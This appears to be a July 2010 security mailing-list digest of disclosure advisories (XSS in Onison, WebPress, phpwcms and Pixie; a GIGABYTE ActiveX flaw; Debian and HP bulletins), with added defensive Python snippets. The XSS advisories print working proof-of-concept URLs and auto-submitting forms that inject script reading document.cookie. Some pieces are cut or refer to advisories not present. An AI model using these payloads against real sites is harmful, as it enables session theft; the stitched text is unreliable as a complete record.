Vendor: Onison ( http://www.onison.com/articles/3 ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to a failure in the slideShow.html script to 
properly sanitize user-supplied input in many variables. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, or disclosure or 
modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:


http://host/slideShow.html?company=COMPANY&userid=USER&CurrentSlide=1&pic=1&slideShowMode=1&external=1&category=_u1234567_inbox%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://host/slideShow.html?company=COMPANY&userid=USER&CurrentSlide=1&pic=1&slideShowMode=1&external=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&category=_u1234567_inbox

http://host/slideShow.html?company=COMPANY&userid=USER&CurrentSlide=1&pic=1&slideShowMode=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&external=1&category=_u1234567_inbox

http://host/slideShow.html?company=COMPANY&userid=USER&CurrentSlide=1&pic=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&slideShowMode=1&external=1&category=_u1234567_inbox

http://host/slideShow.html?company=COMPANY&userid=USER&CurrentSlide=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&pic=1&slideShowMode=1&external=1&category=_u1234567_inbox

http://host/slideShow.html?company=COMPANY%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&userid=USER&CurrentSlide=1&pic=1&slideShowMode=1&external=1&category=_u1234567_inbox





XSS vulnerability in WebPress

2010-07-15 Thread advisory
Vulnerability ID: HTB22481
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress_3.html
Product: WebPress
Vendor: YWP ( http://www.goywp.com/ ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to a failure in the 
admin_page_accounts_users_action.php script to properly sanitize 
user-supplied input in the id_num_mod variable. Successful exploitation of this 
vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, or disclosure or modification of 
sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:


http://host/path/_system/accounts/users/_pages/admin_page_accounts_users_action.php?id_num_mod=xxx%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&submit_action=Edit






Secunia Research: GIGABYTE Dldrv2 ActiveX Control Unsafe Methods

2010-07-15 Thread Secunia Research
== 

 Secunia Research 15/07/2010

 - GIGABYTE Dldrv2 ActiveX Control Unsafe Methods -

== 
Table of Contents

Affected Software ............................................ 1
Severity ..................................................... 2
Vendor's Description of Software ............................. 3
Description of Vulnerability ................................. 4
Solution ..................................................... 5
Time Table ................................................... 6
Credits ...................................................... 7
References ................................................... 8
About Secunia ................................................ 9
Verification ................................................ 10

== 
1) Affected Software 

* GIGABYTE Dldrv2 ActiveX Control 1.4.206.11

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

GIGABYTE's Download Center allows you to quickly download and update 
your BIOS as well as the latest system drivers.

Product Link:
http://download.gigabyte.com.tw/

== 
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in GIGABYTE 
Dldrv2 ActiveX Control, which can be exploited by malicious people to 
compromise a user's system.

1) The unsafe method dl() allows automatically downloading and 
executing an arbitrary file.

2) Combined usage of the unsafe methods SetDLInfo() and Bdl() 
allows automatically downloading an arbitrary file to an arbitrary 
location on the user's system.

== 
5) Solution 

Set the kill-bit for the ActiveX control.
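The kill-bit lives in the registry: IE checks the "Compatibility Flags" value under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} and refuses to instantiate a control whose value has bit 0x400 set. The following added example (not Secunia's or GIGABYTE's code) generates the .reg fragment for a control and reads an exported fragment back to confirm the bit is set. The advisory does not state the Dldrv2 control's CLSID, so EXAMPLE_CLSID is a placeholder to be replaced with the CLSID from the control's registration.

```python
import re

# Registry key IE consults before instantiating a control, and the bit that blocks it.
COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
KILL_BIT = 0x00000400
CLSID_RE = re.compile(r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.I)

# PLACEHOLDER: the advisory does not give the CLSID; take it from the control's registration.
EXAMPLE_CLSID = "{00000000-0000-0000-0000-000000000000}"


def killbit_reg_file(clsid):
    """Return .reg text that sets the kill-bit for one CLSID (the value is written, not OR-ed)."""
    if not CLSID_RE.match(clsid):
        raise ValueError("not a CLSID: %r" % clsid)
    return ("Windows Registry Editor Version 5.00\r\n\r\n"
            "[%s\\%s]\r\n" % (COMPAT_KEY, clsid.upper()) +
            '"Compatibility Flags"=dword:%08x\r\n' % KILL_BIT)


def parse_compat_flags(reg_text):
    """Read {CLSID: flags} out of a .reg export of the ActiveX Compatibility key."""
    flags, current = {}, None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            tail = line[1:-1].rsplit("\\", 1)[-1]
            current = tail.upper() if CLSID_RE.match(tail) else None
        elif current and line.lower().startswith('"compatibility flags"=dword:'):
            flags[current] = int(line.split(":", 1)[1], 16)
    return flags


def killbit_set(reg_text, clsid):
    """True if the exported flags for clsid include the kill-bit."""
    return bool(parse_compat_flags(reg_text).get(clsid.upper(), 0) & KILL_BIT)


if __name__ == "__main__":
    print(killbit_reg_file(EXAMPLE_CLSID))
```

If a control already has a Compatibility Flags value, OR the kill-bit into the existing value rather than importing this fragment, which would overwrite the other flags; after the import, an export of the key fed to `killbit_set` confirms the change took effect.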

== 
6) Time Table 

18/06/2010 - Vendor notified.
29/06/2010 - Vendor response.
15/07/2010 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-1517 for the vulnerabilities.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-85/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


XSS vulnerability in WebPress

2010-07-15 Thread advisory
Vulnerability ID: HTB22480
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress_2.html
Product: WebPress
Vendor: YWP ( http://www.goywp.com/ ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to a failure in the 
admin_page_sidemenu_blocks_action.php script to properly sanitize 
user-supplied input in the id_num_mod variable. Successful exploitation of this 
vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, or disclosure or modification of 
sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:


http://host/path/_system/menus/sidemenu_blocks/_pages/admin_page_sidemenu_blocks_action.php?id_num_mod=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Edcf&submit_action=Edit






Re: pam_captcha username harvest vulnerability

2010-07-15 Thread Jordan Sissel
On Tue, Jul 6, 2010 at 11:04 AM, Ian Maguire imagu...@superb.net wrote:
> pam_captcha is a visual text-based CAPTCHA challenge module for PAM that uses
> figlet to generate the CAPTCHAs.
>
> Project site:
> http://www.semicomplete.com/projects/pam_captcha/
>
> A site with a screen shot:
> http://www.michaelboman.org/how-to/securing-ssh-access-with-pam-captcha
>
> I found a security problem with the pam_captcha. If you enter a username
> that is not a valid user followed by the correct CAPTCHA, you do not get
> prompted for a password. You simply get prompted for another CAPTCHA.
> However, if you enter a username that is a valid user followed by the
> correct CAPTCHA, you will get prompted for a password. This means an
> attacker, or a script/bot could easily harvest a list of valid usernames
> simply by whether or not it prompts for a password after a valid captcha
> entry. I have duplicated this behavior in FreeBSD 8.0 which uses BSD's
> OpenPAM. From what I have seen this module is not compatible with Linux-PAM.
>
> I don't know enough C Fu to propose a patch. Until it is patched the
> solution is to disable pam_captcha in your pam config file. The creator of
> this module seems to think that using this module isn't really even
> necessary.
>
> http://www.semicomplete.com/blog/geekery/pam_captcha_research.html
>
>
> - ian


I can't reproduce the behavior you describe on FreeBSD 8.0 nor on
Ubuntu 9.10. It seems more likely that what you experience is actually
misconfigured sshd/pam.

With pam_captcha 1.3 on a fresh FreeBSD 8.0-RELEASE and this
/etc/pam.d/sshd config:
auth    sufficient  pam_opie.so         no_warn no_fake_prompts
auth    requisite   pam_opieaccess.so   no_warn allow_local
auth    requisite   pam_captcha.so      randomstring
#auth   sufficient  pam_krb5.so         no_warn try_first_pass
#auth   sufficient  pam_ssh.so          no_warn try_first_pass
auth    required    pam_unix.so         no_warn try_first_pass

My sshd_config has this:
ChallengeResponseAuthentication yes
PasswordAuthentication no
UsePAM yes

What I see: Successful pass of the captcha with an invalid username
results in being given another captcha or an abort (if this is
multiple failures) and PAM logs the fact that there was a failure due
to invalid user.

For example, if you don't disable PasswordAuthentication, then after a few
PAM failures (captcha or other failures) sshd will give up and move on to
password auth (no captcha) instead.

Are you sure this isn't something misconfigured on your side? Can you
publish your sshd_config and pam configs?

-Jordan


[SECURITY] [DSA 2071-1] New libmikmod packages fix several vulnerabilities

2010-07-15 Thread Moritz Muehlenhoff
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- 
Debian Security Advisory DSA-2071-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
July 14, 2010 http://www.debian.org/security/faq
- 

Package: libmikmod
Vulnerability  : buffer overflows
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2009-3995 CVE-2009-3996

Dyon Balding discovered buffer overflows in the MikMod sound library, 
which could lead to the execution of arbitrary code if a user is 
tricked into opening malformed Impulse Tracker or Ultratracker sound 
files.

For the stable distribution (lenny), these problems have been fixed in
version 3.1.11-6+lenny1.

For the unstable distribution (sid), these problems have been fixed in
version 3.1.11-6.2.

We recommend that you upgrade your libmikmod packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11-6+lenny1.dsc
Size/MD5 checksum: 1038 9741350a41a54261dbf242f02aa325fd
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz
Size/MD5 checksum:   611590 705106da305e8de191549f1e7393185c
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11-6+lenny1.diff.gz
Size/MD5 checksum:   336630 4e4d04d2c9b5bcdd3edb3b04e683ea86

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_alpha.deb
Size/MD5 checksum:   221696 e01fb2f9c7e693ae7b0727a552da31a1
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_alpha.deb
Size/MD5 checksum:   378570 dd8abb7da4195af53aed1e57750d2f1f

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_amd64.deb
Size/MD5 checksum:   157216 b3836423b8875f21d5ae01d5f9b533c5
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_amd64.deb
Size/MD5 checksum:   265776 935b94d522dd814337b06acd07184fb7

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_arm.deb
Size/MD5 checksum:   164040 f2fdc8c7f4c7f54ec75ffd179c98ddca
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_arm.deb
Size/MD5 checksum:   264064 2eba8b4037ca117fc8920563d2b05ca3

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_armel.deb
Size/MD5 checksum:   155766 916c6a467219ed4a5e0da68168c1e591
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_armel.deb
Size/MD5 checksum:   254664 77c56898614f92c30e0ad5ef2de7c0cc

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_hppa.deb
Size/MD5 checksum:   185910 6b044e5ce0fb2de4fc37a8ddbbd037a0
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_hppa.deb
Size/MD5 checksum:   299236 40db7231bf6258319f45412c1d46df50

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_i386.deb
Size/MD5 checksum:   244570 c4363c834307008b053bb1899a13013f
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_i386.deb
Size/MD5 checksum:   147266 3d8adb8a243afb7a614052ba7494e01e

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_ia64.deb
Size/MD5 checksum:   264426 c2d6c1a0d1b32ff27030ec2f1cd3ebe4
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_ia64.deb
Size/MD5 checksum:   391590 39c904baed7a4462ccbf10805cae88c0

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_mips.deb
Size/MD5 checksum:   167728 708a04685879d374730d4b94dd87a7d8
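Both Debian advisories in this digest (DSA-2070-1 and DSA-2071-1) give the manual path of fetching a package with wget and installing it with dpkg, and list a size and MD5 for every file. The following added example (not Debian's tooling) parses that listing and checks a downloaded file against it before it is handed to dpkg. The listing embedded here is copied from the freetype advisory; the "sample.deb" bytes in the test are constructed. apt verifies the signed Release files on its own, so this check matters only for the wget path the advisory describes.

```python
import hashlib
import re

# Listing lines as they appear in the advisory: a URL followed by its size and MD5.
SAMPLE_LISTING = """\
Source archives:

  http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7-2+lenny2.dsc
    Size/MD5 checksum:     1219 a5930e5dfa3757bed045a67b7ef0e3e2
  http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7.orig.tar.gz
    Size/MD5 checksum:  1567540 c1a9f44fde316470176fd6d66af3a0e8
"""

CHECKSUM_LINE = re.compile(r"Size/MD5 checksum:\s*(\d+)\s+([0-9a-f]{32})")


def parse_advisory(text):
    """Return {filename: (size, md5)} from the URL / 'Size/MD5 checksum' pairs of a DSA."""
    entries, url = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("http://") or line.startswith("https://"):
            url = line
            continue
        m = CHECKSUM_LINE.search(line)
        if m and url:
            entries[url.rsplit("/", 1)[1]] = (int(m.group(1)), m.group(2))
            url = None
    return entries


def fingerprint(content):
    """(size, md5) of downloaded bytes, in the advisory's own terms."""
    return len(content), hashlib.md5(content).hexdigest()


def verify_download(entries, filename, content):
    """Compare a downloaded file against the advisory; only 'ok' should reach dpkg -i."""
    if filename not in entries:
        return "not listed in advisory"
    size, md5 = entries[filename]
    got_size, got_md5 = fingerprint(content)
    if got_size != size:
        return "size mismatch"
    if got_md5 != md5:
        return "md5 mismatch"
    return "ok"


if __name__ == "__main__":
    table = parse_advisory(SAMPLE_LISTING)
    print(table)
    print(verify_download(table, "freetype_2.3.7-2+lenny2.dsc", b"placeholder bytes"))
```

Reading the whole advisory text into `parse_advisory` yields one table for every architecture section, so the same `verify_download` call covers the .deb for the host's architecture as well as the source files.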
  

XSS vulnerability in phpwcms

2010-07-15 Thread advisory
Vulnerability ID: HTB22475
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_phpwcms.html
Product: phpwcms 
Vendor: Oliver Georgi ( http://www.phpwcms.de/ ) 
Vulnerable Version: 1.4.5 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to a failure in the phpwcms.php script to properly 
sanitize user-supplied input in the calendardate variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, or disclosure or 
modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:


http://host/phpwcms.php?do=modules&module=calendar&calendardate=8-2010%22+onmouseover=alert%2834%29+style=position:absolute;width:100%;height:100%;left:0;top:0;+%22

Solution: Upgrade to the most recent version



Stored XSS vulnerability in Pixie

2010-07-15 Thread advisory
Vulnerability ID: HTB22469
Reference: 
http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to a failure in the Pixie core settings saving 
script to properly sanitize user-supplied input in the sysmess variable. 
Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, or disclosure 
or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

<form accept-charset="UTF-8" 
action="http://host/admin/index.php?s=settings&x=pixie" method="post" 
name="main">
<input type="hidden" name="langu" value="en-gb" />
<input type="hidden" name="time_zone" value="+0" />
<input type="hidden" name="dstime" value="no" />
<input type="hidden" name="dateformat" value="%Oe %B %Y, %H:%M" />
<input type="hidden" name="rte" value="1" />
<input type="hidden" name="logs" value="5" />
<input type="hidden" name="sysmess" value='hello 
message<script>alert(document.cookie)</script>' />
<input type="submit" name="settings_edit" id="form_addedit_submit" 
value="Update" />
</form>
<script>
document.getElementById('form_addedit_submit').click();
</script>





[security bulletin] HPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code

2010-07-15 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02288473
Version: 1

HPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution 
of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2010-07-13
Last Updated: 2010-07-13

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running 
rpc.ttdbserver. The vulnerability could be exploited remotely to execute 
arbitrary code.

References: CVE-2010-0083

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running rpc.ttdbserver

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2010-0083(AV:N/AC:M/Au:S/C:C/I:C/A:C)   8.5
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

The vulnerability can be resolved by disabling rpc.ttdbserver.

Note: The rpc.ttdbserver process is not needed for programs provided in the HP 
CDE product.

To Disable rpc.ttdbserver

Edit /etc/inetd.conf and comment out the rpc.ttdbserver line as follows:
#rpc stream tcp swait root /usr/dt/bin/rpc.ttdbserver ...

Restart inetd:
/usr/sbin/inetd -c

Kill any instances of rpc.ttdbserver that might be running.
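The edit the bulletin asks for is a one-line change to /etc/inetd.conf, but on a fleet it is worth making idempotent and auditable. The following added example (not HP's code) reports which active inetd.conf entries launch rpc.ttdbserver and comments them out, matching the server by the basename of any field so that both the path field and a trailing argument copy are recognised. The inetd.conf fragment is constructed for the example; the bulletin's own follow-up steps (reconfiguring inetd with /usr/sbin/inetd -c and killing running instances) are outside this block.

```python
import os

# Constructed inetd.conf fragment; the rpc.ttdbserver line follows the shape the bulletin shows.
SAMPLE_INETD = """\
# constructed fragment, not a real HP-UX configuration
ftp     stream tcp nowait root /usr/lbin/ftpd     ftpd -l
rpc stream tcp swait root /usr/dt/bin/rpc.ttdbserver 100083 1 /usr/dt/bin/rpc.ttdbserver
#rpc stream tcp swait root /usr/dt/bin/rpc.ttdbserver 100083 1 /usr/dt/bin/rpc.ttdbserver
"""


def launches(line, binary):
    """True if an inetd.conf line (blank-separated fields) runs the given server binary."""
    return any(os.path.basename(field) == binary for field in line.split())


def audit_inetd(conf_text, binary="rpc.ttdbserver"):
    """1-based line numbers of active (uncommented) entries that start the binary."""
    return [n for n, line in enumerate(conf_text.splitlines(), 1)
            if not line.lstrip().startswith("#") and launches(line, binary)]


def disable_inetd_service(conf_text, binary="rpc.ttdbserver"):
    """Comment out active entries for the binary; idempotent. Returns (new_text, changed_count)."""
    out, changed = [], 0
    for line in conf_text.splitlines():
        if not line.lstrip().startswith("#") and launches(line, binary):
            line = "#" + line
            changed += 1
        out.append(line)
    return "\n".join(out) + "\n", changed


if __name__ == "__main__":
    print("active rpc.ttdbserver entries on lines:", audit_inetd(SAMPLE_INETD))
    new_text, count = disable_inetd_service(SAMPLE_INETD)
    print("commented out %d line(s)" % count)
    print(new_text)
```

Running `audit_inetd` again after the reconfigure, and checking the process list for rpc.ttdbserver, closes the loop on the "NonUpdate" manual action the bulletin lists.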

MANUAL ACTIONS: Yes - NonUpdate
Disable rpc.ttdbserver

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
==
CDE.CDE-TT
action: disable rpc.ttdbserver

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) 13 July 2010 Initial release
Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for 

XSS vulnerability in Pixie

2010-07-15 Thread advisory
Vulnerability ID: HTB22468
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to a failure in the site settings saving script to 
properly sanitize user-supplied input in the keywords variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, or disclosure or 
modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

<form accept-charset="UTF-8" 
action="http://host/admin/index.php?s=settings&x=site" method="post" 
name="main">
<input type="hidden" name="sitename" value="Pixie" />
<input type="hidden" name="url" value="http://host/" />
<input type="hidden" name="default" value="blog/" />
<input type="hidden" name="keywords" 
value='key1<script>alert(document.cookie)</script>' />
<input type="hidden" name="site_auth" value="sute author" />
<input type="hidden" name="site_cright" value="copyright" />
<input type="hidden" name="cleanurls" value="yes" />
<input type="submit" name="settings_edit" id="form_addedit_submit" 
value="Update" />
</form>
<script>
document.getElementById('form_addedit_submit').click();
</script>
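Every High-Tech Bridge advisory in this digest (Pligg, Taggon CMS, the two WebPress reports, phpwcms and the two Pixie reports) describes the same defect: a request parameter or a stored setting is written into the page without output encoding. The following added example, not code from any of those projects or from the advisories, shows a renderer with that defect beside one that applies html.escape with quote=True, and uses a small HTMLParser subclass to show what a parser makes of each output: the advisories' PoC strings (URL-decoded; the phpwcms one shortened) become a script element or an onmouseover handler in the vulnerable output and plain text in the hardened one. The search form markup is invented for the example. For the Pixie forms, the same encoding applies when the stored sysmess and keywords values are rendered; the auto-submitting form also shows why state-changing admin requests need a CSRF token, which this example does not cover.

```python
import html
from html.parser import HTMLParser

# Payloads from the PoCs above, URL-decoded (the phpwcms one shortened to the attribute breakout).
TAG_PAYLOAD = "'\"><script>alert(document.cookie)</script>"
ATTR_PAYLOAD = '8-2010" onmouseover=alert(34) "'


def render_vulnerable(value):
    """The pattern the advisories describe: the parameter is echoed into markup unchanged."""
    return ('<input type="text" name="search" value="' + value + '">'
            '<p>Results for ' + value + '</p>')


def render_hardened(value):
    """Same page, with the value HTML-encoded for both the quoted-attribute and text contexts."""
    safe = html.escape(value, quote=True)   # encodes & < > " and '
    return ('<input type="text" name="search" value="' + safe + '">'
            '<p>Results for ' + safe + '</p>')


class MarkupAudit(HTMLParser):
    """Count script elements and event-handler attributes the parser sees in a page."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for name, _ in attrs:
            if name.startswith("on"):
                self.event_handlers.append((tag, name))


def audit(rendered):
    """Return what a parser would execute from the rendered page: script count and on* handlers."""
    parser = MarkupAudit()
    parser.feed(rendered)
    parser.close()
    return {"script_tags": parser.script_tags, "event_handlers": parser.event_handlers}


if __name__ == "__main__":
    for payload in (TAG_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable:", audit(render_vulnerable(payload)))
        print("hardened:  ", audit(render_hardened(payload)))
```

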